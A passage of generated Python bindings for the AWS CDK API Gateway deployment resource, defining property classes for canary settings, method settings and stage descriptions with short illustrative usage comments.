@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.CanarySettingProperty", jsii_struct_bases=[], name_mapping={'percent_traffic': 'percentTraffic', 'stage_variable_overrides': 'stageVariableOverrides', 'use_stage_cache': 'useStageCache'})
class CanarySettingProperty():
def __init__(self, *, percent_traffic: typing.Optional[jsii.Number]=None, stage_variable_overrides: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, use_stage_cache: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None):
"""
:param percent_traffic: ``CfnDeployment.CanarySettingProperty.PercentTraffic``.
:param stage_variable_overrides: ``CfnDeployment.CanarySettingProperty.StageVariableOverrides``.
:param use_stage_cache: ``CfnDeployment.CanarySettingProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-canarysetting.html
"""
self._values = {
}
if percent_traffic is not None: self._values["percent_traffic"] = percent_traffic
if stage_variable_overrides is not None: self._values["stage_variable_overrides"] = stage_variable_overrides
if use_stage_cache is not None: self._values["use_stage_cache"] = use_stage_cache
@property
def percent_traffic(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.CanarySettingProperty.PercentTraffic``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-canarysetting.html#cfn-apigateway-deployment-canarysetting-percenttraffic
"""
return self._values.get('percent_traffic')
@property
def stage_variable_overrides(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnDeployment.CanarySettingProperty.StageVariableOverrides``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-canarysetting.html#cfn-apigateway-deployment-canarysetting-stagevariableoverrides
"""
return self._values.get('stage_variable_overrides')
@property
def use_stage_cache(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.CanarySettingProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-canarysetting.html#cfn-apigateway-deployment-canarysetting-usestagecache
"""
return self._values.get('use_stage_cache')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CanarySettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
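# Illustrative sketch (editorial addition): a canary that shifts 10% of
# stage traffic to the new deployment and overrides a stage variable so
# canary requests can target a different backend:
#
#     canary = apigw.CfnDeployment.CanarySettingProperty(
#         percent_traffic=10,
#         stage_variable_overrides={"backend": "canary"},
#         use_stage_cache=False,   # do not reuse the main stage's cache
#     )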
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.DeploymentCanarySettingsProperty", jsii_struct_bases=[], name_mapping={'percent_traffic': 'percentTraffic', 'stage_variable_overrides': 'stageVariableOverrides', 'use_stage_cache': 'useStageCache'})
class DeploymentCanarySettingsProperty():
def __init__(self, *, percent_traffic: typing.Optional[jsii.Number]=None, stage_variable_overrides: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, use_stage_cache: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None):
"""
:param percent_traffic: ``CfnDeployment.DeploymentCanarySettingsProperty.PercentTraffic``.
:param stage_variable_overrides: ``CfnDeployment.DeploymentCanarySettingsProperty.StageVariableOverrides``.
:param use_stage_cache: ``CfnDeployment.DeploymentCanarySettingsProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-deploymentcanarysettings.html
"""
self._values = {
}
if percent_traffic is not None: self._values["percent_traffic"] = percent_traffic
if stage_variable_overrides is not None: self._values["stage_variable_overrides"] = stage_variable_overrides
if use_stage_cache is not None: self._values["use_stage_cache"] = use_stage_cache
@property
def percent_traffic(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.DeploymentCanarySettingsProperty.PercentTraffic``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-deploymentcanarysettings.html#cfn-apigateway-deployment-deploymentcanarysettings-percenttraffic
"""
return self._values.get('percent_traffic')
@property
def stage_variable_overrides(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnDeployment.DeploymentCanarySettingsProperty.StageVariableOverrides``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-deploymentcanarysettings.html#cfn-apigateway-deployment-deploymentcanarysettings-stagevariableoverrides
"""
return self._values.get('stage_variable_overrides')
@property
def use_stage_cache(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.DeploymentCanarySettingsProperty.UseStageCache``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-deploymentcanarysettings.html#cfn-apigateway-deployment-deploymentcanarysettings-usestagecache
"""
return self._values.get('use_stage_cache')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DeploymentCanarySettingsProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
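# Illustrative sketch (editorial addition): unlike ``CanarySettingProperty``
# (which lives inside a stage description), this variant is passed directly
# to the deployment via ``deployment_canary_settings``:
#
#     apigw.CfnDeployment(stack, "CanaryDeployment",
#         rest_api_id="abc123",    # placeholder REST API id
#         stage_name="prod",
#         deployment_canary_settings=apigw.CfnDeployment.DeploymentCanarySettingsProperty(
#             percent_traffic=5,
#         ),
#     )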
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.MethodSettingProperty", jsii_struct_bases=[], name_mapping={'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl_in_seconds': 'cacheTtlInSeconds', 'caching_enabled': 'cachingEnabled', 'data_trace_enabled': 'dataTraceEnabled', 'http_method': 'httpMethod', 'logging_level': 'loggingLevel', 'metrics_enabled': 'metricsEnabled', 'resource_path': 'resourcePath', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit'})
class MethodSettingProperty():
def __init__(self, *, cache_data_encrypted: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_ttl_in_seconds: typing.Optional[jsii.Number]=None, caching_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, data_trace_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, http_method: typing.Optional[str]=None, logging_level: typing.Optional[str]=None, metrics_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, resource_path: typing.Optional[str]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None):
"""
:param cache_data_encrypted: ``CfnDeployment.MethodSettingProperty.CacheDataEncrypted``.
:param cache_ttl_in_seconds: ``CfnDeployment.MethodSettingProperty.CacheTtlInSeconds``.
:param caching_enabled: ``CfnDeployment.MethodSettingProperty.CachingEnabled``.
:param data_trace_enabled: ``CfnDeployment.MethodSettingProperty.DataTraceEnabled``.
:param http_method: ``CfnDeployment.MethodSettingProperty.HttpMethod``.
:param logging_level: ``CfnDeployment.MethodSettingProperty.LoggingLevel``.
:param metrics_enabled: ``CfnDeployment.MethodSettingProperty.MetricsEnabled``.
:param resource_path: ``CfnDeployment.MethodSettingProperty.ResourcePath``.
:param throttling_burst_limit: ``CfnDeployment.MethodSettingProperty.ThrottlingBurstLimit``.
:param throttling_rate_limit: ``CfnDeployment.MethodSettingProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html
"""
self._values = {
}
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl_in_seconds is not None: self._values["cache_ttl_in_seconds"] = cache_ttl_in_seconds
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if http_method is not None: self._values["http_method"] = http_method
if logging_level is not None: self._values["logging_level"] = logging_level
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if resource_path is not None: self._values["resource_path"] = resource_path
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
@property
def cache_data_encrypted(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.MethodSettingProperty.CacheDataEncrypted``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-cachedataencrypted
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.MethodSettingProperty.CacheTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-cachettlinseconds
"""
return self._values.get('cache_ttl_in_seconds')
@property
def caching_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.MethodSettingProperty.CachingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-cachingenabled
"""
return self._values.get('caching_enabled')
@property
def data_trace_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.MethodSettingProperty.DataTraceEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-datatraceenabled
"""
return self._values.get('data_trace_enabled')
@property
def http_method(self) -> typing.Optional[str]:
"""``CfnDeployment.MethodSettingProperty.HttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-httpmethod
"""
return self._values.get('http_method')
@property
def logging_level(self) -> typing.Optional[str]:
"""``CfnDeployment.MethodSettingProperty.LoggingLevel``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-logginglevel
"""
return self._values.get('logging_level')
@property
def metrics_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.MethodSettingProperty.MetricsEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-metricsenabled
"""
return self._values.get('metrics_enabled')
@property
def resource_path(self) -> typing.Optional[str]:
"""``CfnDeployment.MethodSettingProperty.ResourcePath``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-resourcepath
"""
return self._values.get('resource_path')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.MethodSettingProperty.ThrottlingBurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-throttlingburstlimit
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.MethodSettingProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-throttlingratelimit
"""
return self._values.get('throttling_rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodSettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
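# Illustrative sketch (editorial addition): ``http_method="*"`` together with
# ``resource_path="/*"`` applies one setting to every method on every
# resource, a common way to declare a stage-wide throttle:
#
#     stage_desc = apigw.CfnDeployment.StageDescriptionProperty(
#         metrics_enabled=True,
#         method_settings=[apigw.CfnDeployment.MethodSettingProperty(
#             http_method="*",
#             resource_path="/*",
#             throttling_rate_limit=100,   # steady-state requests per second
#             throttling_burst_limit=200,
#         )],
#     )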
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.StageDescriptionProperty", jsii_struct_bases=[], name_mapping={'access_log_setting': 'accessLogSetting', 'cache_cluster_enabled': 'cacheClusterEnabled', 'cache_cluster_size': 'cacheClusterSize', 'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl_in_seconds': 'cacheTtlInSeconds', 'caching_enabled': 'cachingEnabled', 'canary_setting': 'canarySetting', 'client_certificate_id': 'clientCertificateId', 'data_trace_enabled': 'dataTraceEnabled', 'description': 'description', 'documentation_version': 'documentationVersion', 'logging_level': 'loggingLevel', 'method_settings': 'methodSettings', 'metrics_enabled': 'metricsEnabled', 'tags': 'tags', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit', 'tracing_enabled': 'tracingEnabled', 'variables': 'variables'})
class StageDescriptionProperty():
def __init__(self, *, access_log_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.AccessLogSettingProperty"]]]=None, cache_cluster_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_cluster_size: typing.Optional[str]=None, cache_data_encrypted: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_ttl_in_seconds: typing.Optional[jsii.Number]=None, caching_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, canary_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.CanarySettingProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, data_trace_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, logging_level: typing.Optional[str]=None, method_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnDeployment.MethodSettingProperty"]]]]]=None, metrics_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None, tracing_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, variables: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None):
"""
:param access_log_setting: ``CfnDeployment.StageDescriptionProperty.AccessLogSetting``.
:param cache_cluster_enabled: ``CfnDeployment.StageDescriptionProperty.CacheClusterEnabled``.
:param cache_cluster_size: ``CfnDeployment.StageDescriptionProperty.CacheClusterSize``.
:param cache_data_encrypted: ``CfnDeployment.StageDescriptionProperty.CacheDataEncrypted``.
:param cache_ttl_in_seconds: ``CfnDeployment.StageDescriptionProperty.CacheTtlInSeconds``.
:param caching_enabled: ``CfnDeployment.StageDescriptionProperty.CachingEnabled``.
:param canary_setting: ``CfnDeployment.StageDescriptionProperty.CanarySetting``.
:param client_certificate_id: ``CfnDeployment.StageDescriptionProperty.ClientCertificateId``.
:param data_trace_enabled: ``CfnDeployment.StageDescriptionProperty.DataTraceEnabled``.
:param description: ``CfnDeployment.StageDescriptionProperty.Description``.
:param documentation_version: ``CfnDeployment.StageDescriptionProperty.DocumentationVersion``.
:param logging_level: ``CfnDeployment.StageDescriptionProperty.LoggingLevel``.
:param method_settings: ``CfnDeployment.StageDescriptionProperty.MethodSettings``.
:param metrics_enabled: ``CfnDeployment.StageDescriptionProperty.MetricsEnabled``.
:param tags: ``CfnDeployment.StageDescriptionProperty.Tags``.
:param throttling_burst_limit: ``CfnDeployment.StageDescriptionProperty.ThrottlingBurstLimit``.
:param throttling_rate_limit: ``CfnDeployment.StageDescriptionProperty.ThrottlingRateLimit``.
:param tracing_enabled: ``CfnDeployment.StageDescriptionProperty.TracingEnabled``.
:param variables: ``CfnDeployment.StageDescriptionProperty.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html
"""
self._values = {
}
if access_log_setting is not None: self._values["access_log_setting"] = access_log_setting
if cache_cluster_enabled is not None: self._values["cache_cluster_enabled"] = cache_cluster_enabled
if cache_cluster_size is not None: self._values["cache_cluster_size"] = cache_cluster_size
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl_in_seconds is not None: self._values["cache_ttl_in_seconds"] = cache_ttl_in_seconds
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if canary_setting is not None: self._values["canary_setting"] = canary_setting
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if description is not None: self._values["description"] = description
if documentation_version is not None: self._values["documentation_version"] = documentation_version
if logging_level is not None: self._values["logging_level"] = logging_level
if method_settings is not None: self._values["method_settings"] = method_settings
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if tags is not None: self._values["tags"] = tags
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
if tracing_enabled is not None: self._values["tracing_enabled"] = tracing_enabled
if variables is not None: self._values["variables"] = variables
@property
def access_log_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.AccessLogSettingProperty"]]]:
"""``CfnDeployment.StageDescriptionProperty.AccessLogSetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-accesslogsetting
"""
return self._values.get('access_log_setting')
@property
def cache_cluster_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.CacheClusterEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cacheclusterenabled
"""
return self._values.get('cache_cluster_enabled')
@property
def cache_cluster_size(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.CacheClusterSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cacheclustersize
"""
return self._values.get('cache_cluster_size')
@property
def cache_data_encrypted(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.CacheDataEncrypted``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cachedataencrypted
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.StageDescriptionProperty.CacheTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cachettlinseconds
"""
return self._values.get('cache_ttl_in_seconds')
@property
def caching_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.CachingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cachingenabled
"""
return self._values.get('caching_enabled')
@property
def canary_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.CanarySettingProperty"]]]:
"""``CfnDeployment.StageDescriptionProperty.CanarySetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-canarysetting
"""
return self._values.get('canary_setting')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-clientcertificateid
"""
return self._values.get('client_certificate_id')
@property
def data_trace_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.DataTraceEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-datatraceenabled
"""
return self._values.get('data_trace_enabled')
@property
def description(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-description
"""
return self._values.get('description')
@property
def documentation_version(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-documentationversion
"""
return self._values.get('documentation_version')
@property
def logging_level(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.LoggingLevel``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-logginglevel
"""
return self._values.get('logging_level')
@property
def method_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnDeployment.MethodSettingProperty"]]]]]:
"""``CfnDeployment.StageDescriptionProperty.MethodSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-methodsettings
"""
return self._values.get('method_settings')
@property
def metrics_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.MetricsEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-metricsenabled
"""
return self._values.get('metrics_enabled')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``CfnDeployment.StageDescriptionProperty.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-tags
"""
return self._values.get('tags')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.StageDescriptionProperty.ThrottlingBurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-throttlingburstlimit
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.StageDescriptionProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-throttlingratelimit
"""
return self._values.get('throttling_rate_limit')
@property
def tracing_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.TracingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-tracingenabled
"""
return self._values.get('tracing_enabled')
@property
def variables(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnDeployment.StageDescriptionProperty.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-variables
"""
return self._values.get('variables')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'StageDescriptionProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
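# Illustrative sketch (not part of the generated bindings): constructing a
# StageDescriptionProperty by hand. Every literal below is a hypothetical
# placeholder chosen for the example, not a default.
def _example_stage_description() -> "CfnDeployment.StageDescriptionProperty":
    return CfnDeployment.StageDescriptionProperty(
        # Enable a 0.5 GB cache cluster for the stage.
        cache_cluster_enabled=True,
        cache_cluster_size="0.5",
        caching_enabled=True,
        # Throttle the stage to 100 req/s steady-state with a burst of 200.
        throttling_rate_limit=100,
        throttling_burst_limit=200,
        # Stage variables are a plain str -> str mapping.
        variables={"env": "prod"},
    )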
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeploymentProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'deployment_canary_settings': 'deploymentCanarySettings', 'description': 'description', 'stage_description': 'stageDescription', 'stage_name': 'stageName'})
class CfnDeploymentProps():
def __init__(self, *, rest_api_id: str, deployment_canary_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.DeploymentCanarySettingsProperty"]]]=None, description: typing.Optional[str]=None, stage_description: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.StageDescriptionProperty"]]]=None, stage_name: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::Deployment``.
:param rest_api_id: ``AWS::ApiGateway::Deployment.RestApiId``.
:param deployment_canary_settings: ``AWS::ApiGateway::Deployment.DeploymentCanarySettings``.
:param description: ``AWS::ApiGateway::Deployment.Description``.
:param stage_description: ``AWS::ApiGateway::Deployment.StageDescription``.
:param stage_name: ``AWS::ApiGateway::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html
"""
self._values = {
'rest_api_id': rest_api_id,
}
if deployment_canary_settings is not None: self._values["deployment_canary_settings"] = deployment_canary_settings
if description is not None: self._values["description"] = description
if stage_description is not None: self._values["stage_description"] = stage_description
if stage_name is not None: self._values["stage_name"] = stage_name
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Deployment.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-restapiid
"""
return self._values.get('rest_api_id')
@property
def deployment_canary_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.DeploymentCanarySettingsProperty"]]]:
"""``AWS::ApiGateway::Deployment.DeploymentCanarySettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-deploymentcanarysettings
"""
return self._values.get('deployment_canary_settings')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Deployment.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-description
"""
return self._values.get('description')
@property
